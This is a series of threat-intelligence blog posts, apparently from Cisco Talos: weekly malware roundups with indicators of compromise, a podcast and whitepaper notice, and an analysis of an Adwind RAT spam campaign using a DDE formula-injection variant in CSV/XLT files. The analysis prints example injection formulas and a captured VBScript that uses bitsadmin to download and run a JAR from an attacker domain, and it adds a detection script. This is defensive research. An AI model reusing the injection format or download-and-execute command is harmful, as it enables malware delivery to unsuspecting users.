      • %LocalAppData%\Temp\vknsrz3n.wpf.psm1
      File Hashes

      Coverage

      Screenshots of Detection

      AMP

      ThreatGrid

      Umbrella

      Win.Dropper.Darkkomet-6680876-0


      Indicators of Compromise


      Registry Keys
      • <HKCU>\SOFTWARE\DC3_FEXEC
      • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
        • Value Name: turnon
      Mutexes
      • YG75FBKJ76
      IP Addresses
      • 91[.]200[.]124[.]201
      Domain Names
      • val[.]myftp[.]org
      Files and or directories created
      • %AppData%\dclogs
      • %AppData%\ace.exe
      • %LocalAppData%\Temp\OSXEF.txt
      • %LocalAppData%\Temp\OSXEF.bat
      File Hashes

      Coverage

      Screenshots of Detection

      ThreatGrid

      Win.Dropper.Ponystealer-6680912-0


      Indicators of Compromise


      Registry Keys
      • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
        • Value Name: Registry Key Name
      • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
      • <HKCU>\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
      • <HKCU>\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\
      • <HKCU>\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook_2016\
      • <HKLM>\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\
      • <HKLM>\SOFTWARE\Wow6432Node\Mozilla\Mozilla Thunderbird\
      • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
        • Value Name: MPX0O4RP3X
      • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
        • Value Name: LTWTXJJ0
      • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
        • Value Name: K62XHZYXTH
      • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
        • Value Name: XTWXCZIXDHF
      Mutexes
      • 8-3503835SZBFHHZ
      • 299N2C3FD0EVCX9z
      IP Addresses
      Domain Names
      Files and or directories created
      • %LocalAppData%\Temp\subfolder\filename.vbs
      • %LocalAppData%\Temp\subfolder\filename.bat
      • %AppData%\299N2C3F\299log.ini
      • %AppData%\299N2C3F\299logim.jpeg
      • %AppData%\299N2C3F\299logrc.ini
      • %AppData%\299N2C3F\299logri.ini
      • %AppData%\299N2C3F\299logrv.ini
      • %LocalAppData%\Temp\Bfz8hctw\msltqlrvah.exe
      • %WinDir%\SysWOW64\shdocvw.dll
      • %ProgramFiles% (x86)\Ktbchzlcx\winnnhlg.exe
      • %ProgramFiles% (x86)\Copx0\services9rdh.exe
      File Hashes

      Coverage

      Screenshots of Detection

      ThreatGrid

      Umbrella

      Win.Dropper.Tspy-6680869-0


      Indicators of Compromise


      Registry Keys
      • <HKCU>\SOFTWARE\REMCOS-4TJ61G
        • Value Name: exepath
      • <HKCU>\SOFTWARE\REMCOS-4TJ61G
        • Value Name: lic
      Mutexes
      • 3749282D282E1E80C56CAE5A
      • Remcos-4TJ61G
      • Remcos_Mutex_Inj
      IP Addresses
      • 89[.]38[.]241[.]133
      • 173[.]46[.]85[.]220
      Domain Names
      • novachim[.]ro
      • doublelogs[.]ddns[.]me
      Files and or directories created
      • %AppData%\D282E1\1E80C5.lck
      • %AppData%\jeje\mula.exe
      • %AppData%\jeje\mula.exe:ZoneIdentifier
      • %AppData%\Microsoft\Windows\Start Menu\Programs\Startup\jeje.vbs
      • %AppData%\oir\jjd.dat
      File Hashes

      Coverage

      Screenshots of Detection

      ThreatGrid

      Umbrella

      Win.Dropper.Fareit-6680873-0


      Indicators of Compromise


      Registry Keys
      • <HKCU>\SOFTWARE\WINRAR
        • Value Name: HWID
      • <HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003E9
        • Value Name: F
      • <HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000001F5
        • Value Name: F
      • <HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003EC
        • Value Name: F
      Mutexes
      • 3749282D282E1E80C56CAE5A
      • Stertorous8
      • Decent5
      • A4gds89g46dfgs
      • Reserveful
      • Sabbagh0
      • Elfic
      IP Addresses
      • 185[.]36[.]191[.]6
      • 104[.]24[.]126[.]133
      Domain Names
      • www[.]bellyrocksh[.]com
      • etete[.]eu
      • larrydaves[.]cf
      • vivsinomain1[.]cf
      • sunnynaturelstone[.]com
      Files and or directories created
      • %AppData%\D282E1\1E80C5.lck
      • %System32%\config\SAM
      • %LocalAppData%\Temp\1153725803.bat
      File Hashes

      Coverage

      Screenshots of Detection

      ThreatGrid

      Umbrella

      Beers with Talos EP 37: Snort 3 Beta Uses Multithreading. It’s Super Effective!



      Beers with Talos (BWT) Podcast Ep. #37 is now available. Download this episode and subscribe to Beers with Talos:

      If iTunes and Google Play aren't your thing: www.talosintelligence.com/podcast.

      Ep. #37 show notes: 

      Recorded Sept. 7, 2018 — We have Joel back this week (and he is very happy to have himself back), but we lost Matt and we’re still wishing Nigel a speedy recovery from becoming bionic. This episode, we cover the latest findings in our research into a malicious mobile device management (MDM) campaign that's targeting iPhones and go over the exciting changes in the newly released Snort 3 beta (your move, Valve). Bill reprises his role from last week as sentient seat-filler that makes good jokes.

      The timeline:

      The topics

      1:20 - Roundtable — Your washer does not need WiFi. Stop it.
      6:50 - MDM — Let’s Hide This App: The latest MDM update, plus the challenge of continuing research.
      21:25 - Snort 3, the beta. This time, it’s multi-threaded.

      The links

      "Let’s Hide This App" blog post: https://blog.talosintelligence.com/2018/09/ios-mdm-hide-the-app.html

      ==========

      Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler).  Special Guest: Bill Largent (@security_will).
      Hosted by Mitch Neff (@MitchNeff).

      Find all episodes:
      http://cs.co/talospodcast

      Subscribe via iTunes (and leave a review!)
      http://cs.co/talositunes

      Check out the Talos Threat Research Blog:
      http://cs.co/talosresearch

      Subscribe to the Threat Source newsletter:
      http://cs.co/talosupdate

      Follow Talos on Twitter:
      http://cs.co/talostwitter

      Give us your feedback and suggestions for topics:
      beerswithtalos@cisco.com

      Cyber Threat Alliance Releases Cryptomining Whitepaper

      This post is authored by Ashlee Benge.

      Despite the recent devaluation of some cryptocurrencies, illicit cryptocurrency miners remain a lucrative and widespread attack vector in the threat landscape. These miners are easy to deploy, and attackers see it as a quick way to steal other users' processing power to generate cryptocurrency. These attacks are harder to notice than a traditional denial-of-service or malware campaign, resulting in reduced risk and a more stable foothold for a malicious actor. The Cyber Threat Alliance, with contributions from Cisco Talos and other CTA members, has released a whitepaper detailing the rise of cryptomining attacks that outlines what you — and your organization — should know about these kinds of campaigns.

      This paper covers the fact that there is a low technical barrier to entry for attackers, and that there are accessible patches to protect users from many of these attacks. Because cryptomining campaigns are easy to launch, a broader set of actors have engaged in this activity, resulting in a higher rate of attacks. Talos often observes multiple actors with illicit cryptomining software on the same compromised box. The use of well-known vulnerabilities by attackers essentially turns this problem into a canary-in-the-coalmine situation for defenders. If you discover unauthorized cryptomining software on one of your assets, there is a high likelihood that other actors have also leveraged the weaknesses in your systems to gain access — potentially for more damaging purposes.

      Prior Coverage


      Snort signatures exist to provide coverage for a variety of miner downloads and malware variants related to cryptocurrency miners, and to block protocols commonly used by miners.

      The following SIDs detect incoming clients and miner downloads:

      44692-44693, 45265-45268, 45809-45810, 45949-45952, 46365-46366 and 46370-46372.

      The following SIDs detect malware variants known to be associated with miners:

      20035, 20057, 26395, 28399, 28410-28411, 29493-29494, 29666, 30551-30552, 31271-31273, 31531-31533, 32013, 33149, 43467-43468, 44895-44899, 45468-45473, 45548, 45826-45827, 46238-46240.

      The following SIDs detect Stratum protocols used by cryptocurrency workers:

      26437, 40840-40842, 45417, 45549-45550, 45825, 45955.

      Additional rules may be released at a future date, and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Console or Snort.org.

      Threat Roundup for September 14 to September 21

      Today, as we do every week, Talos is giving you a glimpse into the most prevalent threats we’ve observed this week — covering the dates between Sept. 14 and 21. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, we will summarize the threats we’ve observed by highlighting key behavioral characteristics and indicators of compromise, and discussing how our customers are automatically protected from these threats.

      As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

      The most prevalent threats highlighted in this round up are:

      • Win.Dropper.Genkryptik-6690044-0
        Dropper
        This threat attempts to spread via removable drives and spam email. It uses legitimate SMTP servers to send spam from its victims.
         
      • Win.Dropper.Dofoil-6689818-0
        Dropper
        Dofoil, aka SmokeLoader, is primarily used to download and execute additional malware. Read more about this threat on our blog here.
         
      • Doc.Malware.Nastjencro-6688356-0
        Malware
        Nastjencro uses PowerShell to download and execute additional malware.
         
      • Win.Dropper.Kovter-6689163-0
        Dropper
Kovter uses mshta and PowerShell to minimize its footprint on the victim's hard drive. It uses the registry to execute a malicious script any time a file with a specific file extension is opened (e.g. *.clUQwv).
         
      • Win.Dropper.Coinminer-6688928-0
        Dropper
        This malware installs and executes cryptocurrency mining software. You can read more about this kind of threat on our blog.
         
      • Win.Dropper.Fareit-6688124-0
        Dropper
        The Fareit trojan is primarily an information stealer with the ability to download and install other malware.
         
      • Doc.Downloader.Pederr-6686124-0
        Downloader
        Pederr uses malicious PowerShell scripts to download and execute a malicious executable. It has been seen installing banking malware such as Emotet.
         

      Threats

      Win.Dropper.Genkryptik-6690044-0


      Indicators of Compromise


      Registry Keys
      • N/A
      Mutexes
      • N/A
      IP Addresses
      • N/A
      Domain Names
      • smtp[.]yandex[.]com
      Files and or directories created
      • %AppData%\Windows Update.exe
      • \??\E:\Sys.exe
      • \??\E:\autorun.inf
      File Hashes

      Coverage

      Screenshots of Detection

      AMP
      ThreatGrid
      Umbrella

      Win.Dropper.Dofoil-6689818-0


      Indicators of Compromise


      Registry Keys
      • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
        • Value Name: internat.exe
      Mutexes
      • N/A
      IP Addresses
      • 99[.]12[.]215[.]168
      • 98[.]217[.]41[.]219
      • 99[.]152[.]6[.]105
      • 98[.]66[.]233[.]28
      Domain Names
      • N/A
      Files and or directories created
      • N/A
      File Hashes

      Coverage

      Screenshots of Detection

      AMP
      ThreatGrid

      Doc.Malware.Nastjencro-6688356-0


      Indicators of Compromise


      Registry Keys
      • N/A
      Mutexes
      • N/A
      IP Addresses
      • 185[.]159[.]130[.]242
      • 185[.]228[.]232[.]143
      Domain Names
      • N/A
      Files and or directories created
      • %LocalAppData%\Temp\qqqqqqqqq_qqqqq_qqqqqq_qqqqqqq74.exe
      • %LocalAppData%\Temp\handler.bat
      • %LocalAppData%\Temp\j55xmasb.5xy.ps1
      File Hashes

      Coverage

      Screenshots of Detection

      AMP
      ThreatGrid


      Win.Dropper.Kovter-6689163-0


      Indicators of Compromise


      Registry Keys
      • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
        • Value Name: \x008567f942
      • <HKCR>\DR2V\SHELL\OPEN\COMMAND
      • <HKCR>\.CLUQWV
      • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
        • Value Name: \x0070f54730
      Mutexes
      • N/A
      IP Addresses
      • 98[.]228[.]140[.]122
      • 99[.]78[.]177[.]117
      Domain Names
      • find-dentalimplants[.]com
      Files and or directories created
      • %LocalAppData%\ejybag\i3f1uvT.clUQwv
      • %LocalAppData%\Temp\y4os1u24.vgj.ps1
      File Hashes

      Coverage

      Screenshots of Detection

      AMP
      ThreatGrid

      Win.Dropper.Coinminer-6688928-0


      Indicators of Compromise


      Registry Keys
      • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\ZENUPDATE
        • Value Name: Type
      Mutexes
      • N/A
      IP Addresses
      • 94[.]130[.]64[.]225
      Domain Names
      • xmr[.]pool[.]minergate[.]com
      Files and or directories created
      • %LocalAppData%\Temp\RarSFX0\mexas.exe
      • %LocalAppData%\Temp\RarSFX1\Support.exe
      • %LocalAppData%\Temp\RarSFX1\system.exe
      • %WinDir%\Windows\1.exe
      • %WinDir%\Windows\1.vbs
      • %WinDir%\Windows\sistem.bat
      • %WinDir%\Windows\sistem.exe
      • %LocalAppData%\Temp\RarSFX2\3.bat
      File Hashes

      Coverage

      Screenshots of Detection

      AMP
      ThreatGrid

      Win.Dropper.Fareit-6688124-0


      Indicators of Compromise


      Registry Keys
      • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
        • Value Name: K4XD4XP0OPG
      Mutexes
      • 8-3503835SZBFHHZ
      • OMM-7UQ942T0D7yz
      IP Addresses
      • 217[.]160[.]223[.]46
      • 98[.]124[.]199[.]17
      • 52[.]54[.]24[.]134
      Domain Names
      Files and or directories created
      • %AppData%\Microsoft\Windows\Start Menu\Programs\Startup\h.vbs
      • \TEMP\transfer application.exe
      File Hashes

      Coverage

      Screenshots of Detection

      AMP
      ThreatGrid
      Umbrella


      Doc.Downloader.Pederr-6686124-0


      Indicators of Compromise


      Registry Keys
      • N/A
      Mutexes
      • N/A
      IP Addresses
      • 220[.]253[.]68[.]95
      • 69[.]70[.]248[.]98
      Domain Names
      • familiekoning[.]net
      Files and or directories created
      • %UserProfile%\480.exe
      • %LocalAppData%\Temp\zaybh0yp.m4u.ps1
      File Hashes

      Coverage

      Screenshots of Detection

      AMP
ThreatGrid
Umbrella


      Adwind Dodges AV via DDE

This blog post is authored by Paul Rascagneres and Vitor Ventura, with the contribution of Tomislav Pericin and Robert Perica from ReversingLabs.

      Introduction


      Cisco Talos, along with fellow cybersecurity firm ReversingLabs, recently discovered a new spam campaign that is spreading the Adwind 3.0 remote access tool (RAT), targeting the three major desktop operating systems (Linux, Windows and Mac OSX). This new campaign, first discovered by ReversingLabs on Sept. 10, appears to be a variant of the Dynamic Data Exchange (DDE) code injection attack on Microsoft Excel that has appeared in the wild in the past. This time, the variant is able to avoid detection by malware-blocking software. ReversingLabs has written their own blog on this issue here.

      The majority of the targets in this campaign are in Turkey, according to data from the Cisco Umbrella cloud security platform. After our research, we have discovered important details about this attack, as well as the malicious, forged Microsoft Office documents that the attackers are using.




      Spam campaign


      Our Umbrella telemetry shows that this campaign started on Aug. 26, 2018, peaking on Aug. 28.
      DNS query hits

      Umbrella also shows that 75 percent of the requests were made from Turkey. This is no surprise, considering the language in the spam emails is Turkish. Some of the targets were also located in Germany, which makes sense given that there is a significant Turkish community in Germany. The attackers tempt the user with an email about the cost of footwear in this particular example below.
      Sample of spam email

      In the screenshot above, we can see a CSV file is attached. We identified attachments with the .XLT extension, too — please see the "Microsoft Office Dropper" section for additional details.

      Microsoft Office Dropper


We have seen at least two different droppers in this campaign. They use either the .csv or .xlt extension, both of which are opened by Microsoft Excel by default. Both versions leverage a new variant of the DDE code injection attack. Although the method itself is well known, this variant was undetected at the time of this writing.

A dropper implementing this method has the following internal format:
<random quantity of data><special byte><code to be executed><random quantity of data>
Here is a breakdown of what each part means:

<random quantity of data>: random data in any quantity; the trailing block is optional. The data does not need to be ASCII.

<special byte>: 0x0A (new line) or 0x0D (carriage return). Excel interprets either byte as a row break, so whatever follows lands in the first cell of the next row.

<code to be executed>: the command must start with "=", "+" or "-", or be wrapped in a function such as @SUM(). The command format is command|'argument'!cell. The cell reference does not need to be a valid one. For example:
=calc|' '!A0
+msiexec|' /q /i C:\Users\user\Downloads\file.msi'!A0
@SUM(calc|' '!A0)
The dropper file can have any of the extensions in the table below. Not all of them are opened by Microsoft Excel by default; for the non-default extensions, a script that starts Excel with such a file as a parameter is still a viable attack scenario.
Formats like CSV have no predefined header, so the file can begin with any kind of data. Leading random data like that in the samples we found may trick antivirus software into skipping the file scan. Files in other formats may be considered corrupted, since they no longer follow the expected structure.

      Here is an example:
      00000830  47 fc c9 c8 5f 27 5b 6e  4e e2 d6 88 21 24 cc 27  |G..._'[nN...!$.'|
      00000840 88 7e 5e bf 40 c2 e9 cd 8a f2 9f 2c b7 d9 b5 a8 |.~^.@......,....|
      00000850 2a c6 98 0d 0a 3d 63 6d 64 7c 27 20 2f 63 20 40 |*....=cmd|' /c @|
      00000860 65 63 68 6f 20 53 65 74 20 57 58 57 59 4b 4e 52 |echo Set WXWYKNR|
      00000870 47 20 3d 20 43 72 65 61 74 65 4f 62 6a 65 63 74 |G = CreateObject|
      00000880 28 22 57 73 63 72 69 70 74 2e 53 68 65 6c 6c 22 |("Wscript.Shell"|
      00000890 29 20 3e 20 4e 4d 55 57 59 54 47 4f 2e 76 62 73 |) > NMUWYTGO.vbs|
      000008a0 20 26 20 40 65 63 68 6f 20 57 58 57 59 4b 4e 52 | & @echo WXWYKNR|
      000008b0 47 2e 52 75 6e 20 22 63 6d 64 20 2f 63 20 62 69 |G.Run "cmd /c bi|
      000008c0 74 73 61 64 6d 69 6e 20 2f 74 72 61 6e 73 66 65 |tsadmin /transfe|
      000008d0 72 20 38 20 2f 64 6f 77 6e 6c 6f 61 64 20 68 74 |r 8 /download ht|
      000008e0 74 70 3a 2f 2f 65 72 61 79 69 6e 73 61 61 74 2e |tp://erayinsaat.|
      000008f0 6c 69 76 65 20 25 74 65 6d 70 25 5c 4e 4d 55 57 |live %temp%\NMUW|
      00000900 59 54 47 4f 2e 6a 61 72 26 25 74 65 6d 70 25 5c |YTGO.jar&%temp%\|
      00000910 4e 4d 55 57 59 54 47 4f 2e 6a 61 72 22 2c 30 2c |NMUWYTGO.jar",0,|
      00000920 54 72 75 65 20 3e 3e 20 4e 4d 55 57 59 54 47 4f |True >> NMUWYTGO|
      00000930 2e 76 62 73 26 20 4e 4d 55 57 59 54 47 4f 2e 76 |.vbs& NMUWYTGO.v|
      00000940 62 73 27 21 41 30 0d 0a 6e e3 b0 c6 a3 40 b4 fb |bs'!A0..n....@..|
      Example of a dropper
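One way a defender can check files for the layout above, as an added example that is not Talos' or ReversingLabs' code: a Python scanner that ignores whatever bytes precede a row break (0x0A or 0x0D) and flags any first-of-row cell that starts with a formula trigger and carries a command|'argument'!cell invocation. The sample bytes are constructed here from the post's own benign `=calc` example; the function and constant names are the example's own.

```python
"""Scan CSV/XLT-style files for the DDE dropper layout described in the post:
<random data><0x0A or 0x0D><formula cell with command|'argument'!cell><random data>.
Added example, not Talos' or ReversingLabs' code."""
import re
import sys

# Characters Excel treats as the start of a formula in a cell (from the post).
FORMULA_TRIGGERS = b"=+-@"

# Excel starts a new row after a New Line (0x0A) or Carriage Return (0x0D).
ROW_SEPARATORS = b"\n\r"

# DDE invocation shape from the post: command|'argument'!cell
# (command = application name, single-quoted argument, then !cell; the cell
# does not have to be valid, so any letters followed by digits are accepted).
DDE_PATTERN = re.compile(rb"([A-Za-z0-9_.:\\]+)\|'([^']*)'!([A-Za-z]+[0-9]+)")


def row_starts(data: bytes):
    """Yield every offset at which Excel would begin a new row: offset 0 and
    the byte after each 0x0A/0x0D, whatever precedes it (binary junk included)."""
    yield 0
    for i, b in enumerate(data):
        if b in ROW_SEPARATORS and i + 1 < len(data):
            yield i + 1


def find_dde_cells(data: bytes):
    """Return [(offset, command, argument, cell), ...] for every first-of-row
    cell that starts with a formula trigger and carries a DDE invocation.
    Leading random data is ignored on purpose: that is the evasion the post
    describes, so a detector must not rely on the file header looking sane."""
    hits = []
    if not data:
        return hits
    for start in row_starts(data):
        if data[start] not in FORMULA_TRIGGERS:
            continue
        # The candidate cell runs up to the next row separator (or EOF).
        end = start
        while end < len(data) and data[end] not in ROW_SEPARATORS:
            end += 1
        m = DDE_PATTERN.search(data[start:end])
        if m:
            hits.append((start,
                         m.group(1).decode("latin-1"),
                         m.group(2).decode("latin-1"),
                         m.group(3).decode("latin-1")))
    return hits


def scan_file(path: str):
    """Convenience wrapper: scan a file on disk and return find_dde_cells() hits."""
    with open(path, "rb") as fh:
        return find_dde_cells(fh.read())


# Constructed sample (not a real dropper): junk bytes, a row break, the post's
# benign =calc formula, another row break, more junk. Offset of '=' is 10.
SAMPLE_DROPPER = (b"\x47\xfc\xc9\xc8\x5f\x27\x5b\x6e"
                  + b"\r\n" + b"=calc|' '!A0" + b"\r\n"
                  + b"\x6e\xe3\xb0\xc6\xa3\x40\xb4\xfb")

# Constructed benign CSV: a row starting with "-" is a negative number, not DDE.
BENIGN_CSV = b"item,qty\r\nwidget,-5\r\n-3,credit\r\n"


if __name__ == "__main__":
    paths = sys.argv[1:]
    if not paths:
        print("constructed dropper:", find_dde_cells(SAMPLE_DROPPER))
        print("benign csv:", find_dde_cells(BENIGN_CSV))
    for path in paths:
        for off, cmd, arg, cell in scan_file(path):
            print(f"{path}: DDE formula at offset {off:#x}: {cmd}|'{arg}'!{cell}")
```

Every row break is treated as a row start, so a quoted CSV field containing a newline can produce an extra candidate; that errs on the side of reporting, which is the right default for a triage scanner.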

Excel will display warnings to the user regarding the execution of code. Here is an example where the payload executes "calc.exe":
      Excel corruption warning upon execution

      As you can see, Excel detects that the opened file is not a real XLT document. It explains that the file is probably corrupted and asks the user if they are sure they want to open it.
      Command execution warning

      The second warning notifies the user that the document will execute the application "CMD.exe."
      Calc execution

      If the user accepts the three warnings, the system will open the calculator application.

      In this campaign, the purpose of the injected code was to create and execute a VBScript with the following content:
      Set WXWYKNRG = CreateObject("Wscript.Shell")
      WXWYKNRG.Run "cmd /c bitsadmin /transfer 8 /download hxxp://erayinsaat[.]live %temp%\NMUWYTGO.jar&%temp%\NMUWYTGO.jar",0,True
The script uses bitsadmin, a tool provided by Microsoft to create download or upload jobs and monitor their progress, to fetch the final payload. This payload is a Java archive file.

      Java Payload


      The Java code is packed with the demo version of a commercial packer named "Allatori Obfuscator version 4.7."
      Packer banner

      We identified the packed malware as Adwind RAT v3.0.
      Adwind configuration

      It's a well-known multiplatform RAT with several configurations possible. The samples we tested were configured to achieve persistence on Windows, Linux and Mac OSX. Each platform has its own persistence name (see IOC section).

This RAT is used by several malicious groups. It gives its operators the ability to execute any kind of command on the victim's machine, log keystrokes, take screenshots, take pictures with the webcam or transfer files. In the past, it has been used to run cryptocurrency mining campaigns and in a separate attack that targeted the aviation industry.

      Conclusion


      The DDE variant used by the droppers in this campaign is a good example of how signature-based antivirus software can be tricked. It is also a warning sign regarding file extension-scanning configurations. This kind of injection has been known for years, however, this actor found a way to modify it in order to have an extremely low detection ratio. The malicious actor used a well-known multiplatform RAT with a wide range of capabilities — a "field proven" RAT that ensured it would work as designed and go undetected. Although both the generic method and the payload are known, this campaign shows how some variance in well-known artifacts can trick antivirus software. Their behavior, however, is clearly classical, which means that sandboxing- and behavior-based solutions aligned with intent-based networks should be able to detect and stop these threats without problems.

      Coverage


      Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

      Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

      Email Security can block malicious emails sent by threat actors as part of their campaign.

      Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

      AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

      Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

      Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

      IOCs

      URLs

      hxxp://avrasyagrup[.]live
      hxxp://avrasyayapi[.]live
      hxxp://birlikholding[.]live
      hxxp://erayinsaat[.]live
      hxxp://qakeyewoha[.]club
      hxxp://yeyamohofe[.]club

      Hashes

      Office Documents

      59e72fd77130a2a0544c5c423e9545e6b849acbb8dd3b1a720f963736822629d
      5a2c1f55178421ae66246e5a9dd02f7c0ce8fc0082e07131a477985e59c0b091
      5a5f3d1eb98268ab28d90290c311e85b8078dd8a5e2d4af3d97bac72cdbaf608
      5ae6438e876b6479672996fa7a1f83bc86d87c219de9e35f042661ff9a3316b7
      5d79e1c5bcb72748e512369d5f3059cfe0b3ea854868ec0fa2af782b4fb3dc0d
      5f68af453c470804a873b91043ed5aa98a0196b8bc36ea1b06375814412423bc
      6073fbefc440bc037c01bf361b6dc15801253339a3c40cf320dc7db1d3e1fab7
      65bae7412363a2d2d595f8c84cd2a74f308fe782d99d28809ae779aef68115e2
      65e9385ebb2ee02f5598bac5ea60781ef52bde5f24edcaf3dec87e5bd8e276c9
      6649e13fe463b984d53ed1d88b7b3a5a71afe4ab345e6414f8ac331b1920f71a
      67c479955311aa7adcfbe91b66b90b6a6d145dde0613a2dd72159db0b811e9d6
      68de8691070ac38db2961eaf4e72296279ef2f21959a0a84c600e08e06c9cc82
      6a4f25f68dee6eaf7d745b364dfcdd28036949200b26685722f5e757b84d8947
      6e10ec07bc40ee89e438f9a3a5b5161b36fa00b39321c704f22a62fcda6253aa
      6e44d7e246766f2c9b41ff61630e8bc43e8f4223ddfd867b22798d24ca8a1bb1
      71da26a65efd35422c0db45682daf285c5eb67a4214ab6159fa963e242852546
      72d39c33569f3f5a8e48f3bbc85d659128edadde45838ddcad1f5d68ae289a0c
      7590ce94e48fa7e61719aca6efe9cd11fb3e0bede9d7fcf87f6ed8d470215a5f
      75ae66563e078fb29026cb0325198c7b02475f397354d127057fa9bd1ce33d44
      769c0bef0870ee8417867384098982b28c8255f0fa6f0331d44e9c7b1c2eb7fd
      78ef4a2052410b85b197dcbccdf8531fb0acc0fd1d7a682d9c152d31502f8a3b
      79cbb38edc1ce1cff20207e00ec1071ccfd56de922d64a759a6b793d685f01c3
      7cbf55984d4a98f6711de655ff1c59708911a9c0220abfd4178b2d3ac28288c6
      7e94fab8610bcd5cb4ffde8afb01c04671576999082a7fa828caff79450c3a4b
      7ffb7714e0fca5497c3f1ac008721c2773ebca81a6fe6673f4642fbc2695b8f4
      8129156d2990dfc3a6146afcbe40c0a52da3af8705701387016810cc30220b05
      81c96b002bba3a5e1ba200fa655cd6d3d90ef5560d1a9ef98c156aa467221272
      84aeeea5704dc5e09881d446f34625ad1812e318c4e3a70288992cb07e6cd2d3
      84cdb095ab945aeef51418cd6fd45eb1812cbfb68333eeafb95408925811b8e6
      868142957bf06e150ba385d988f87e3c3630ad8ba2baf5c9c7d9fe50ea7a69e3
      86e61aafe93dcb9530cb58d00e69d209488073fd1d06dd92fd17f0c81dbe5d5b
      86fd640eaf182fee13c16e8858c8b058acb451af4b5fc14589ba1fd277d4b60b
      8a182b9f7b348d1964f9da9d6089f1296a3cd71f563c492eded0be65c9d6792c
      8a6452c8591d3f07ef6b01dd49304d2b9c7b063a489ab568dabf4ca7d90e3229
      8e9a290e9358a0e0662d79b00eed2658bc94b7d607159198bad787f612d51e49
      8efbe0889db86bcecc5ff43765683f2c00b65af9803e0cb282fadd58feb03776
      90f6ee05006a1d3837e16f3b243f0ee088596d1547f399b92ccc1017e1047957
      91baf2e005e010c91e3ae50d6c5430492d0f1c919548c8e335fe9514268e9fb4
      925398783d6f4e4dbe9f85161b88d308064127d665cf6f876e73c59e51f97a9a
      9261f9ebf099112ca4f29598a822aa1e490c851b1628c1dcdc023a90b257c202
      928d2722fbc0bfaa085f11dbaa8a748f7dbf0b0d5fc632b34a97f89e3006d2ec
      9473ce9fba30cf8d338f5517eae1f1b6629b0594810ef1d0b126e45ef624fbf4
      94b3811307fa1458a7701096e5b9820c264d0bb331ed4fce7a51ea47d7c2c450
      95c0cc0f7391b97437174d65321448bed99820985f12eeff0d47840f3df46a26
      9cc4ca0aa1b929878bff9d9fd03dcef0cad039e65ed7ede73424d8851ddc09e1
      9d8583048ee607ae4c6f6e0dff2f899b092bd1984570b2719e5345b91b830976
      9d8fd20239541656cf3713e221303897551b6f12f358d46ac638f6dff3cc1c86
      9e45c093cae1c9334962d1a7ce2f6e71042543712a3ea86c37074e532a926823
      9f8af28b654d32a26f1edeccf7da92a01fdcaf6e9c9c64a2795fe8111e65f53e
      a2fb4cb9e9ac4f30b5f6d30de7c43901607498d760e34aec87700f27b3a246b4
      a5ce37f3b0f797b251cdf32dbe25db779e0464673e3cff33e33c0fa7552b8543
      a5faa8be836152acac6eb28ed45c042d793b5e0ecc54eb8a081af69510b46077
      a5fac06abe7fc1d4b425042cf6cd4ee1d49032368d537aa09086413c980540b2
      a6b1d4e677b5fc1757358937ab166611c88519ff8827ce8ed388993239e0ffe7
      a6daddeec987620e07d6141579583e8b239a087d216fd4bd214cec963e27f6df
      a78ad2d3a68d03f306a81eedd12668d101c3b329cc4c396f119b7b863a9a43cd
      a79f13267769a8d2ab4b2122c5f1bc5d5972e13ec2ebad829f7305b60e6138c0
      a940ca6b3193b7c1d52ce949e688cb6c5c00b330e01c95bb2422d7d79dba0155
      a9c082d3e50c61bdbf97ad3b3f0077685a6821cbe65d80fe176aaa92d1401e53
      aa8cbb00c9090a5d223bc7f51f5bc5ab55db17a62341e5335d1860ce68cea918
      aa9dd7fc6f98833216c6c7f9a820d3eed39072280aed2760d71732bc66b7604f
      ad878d73de2a4e14684473616fb8a09b3e7ec7c725ef7ac0ecb17e9f09367b39
      adf21761baf7dfa6d2beafe47fce02f61d6349e15e54c9366e9360d0f3f29e46
      af91ac41500194b202ebb353066906c7ca01cfef3b482d7deaf24d60e486687c
      b0cf3219729924e2edbea9d9008acac8f898c063e0b3dfbbb445a20b62000318
      b10153504352f007853ad9828139904aada6a884ebe13f8e5792223ad8f856e1
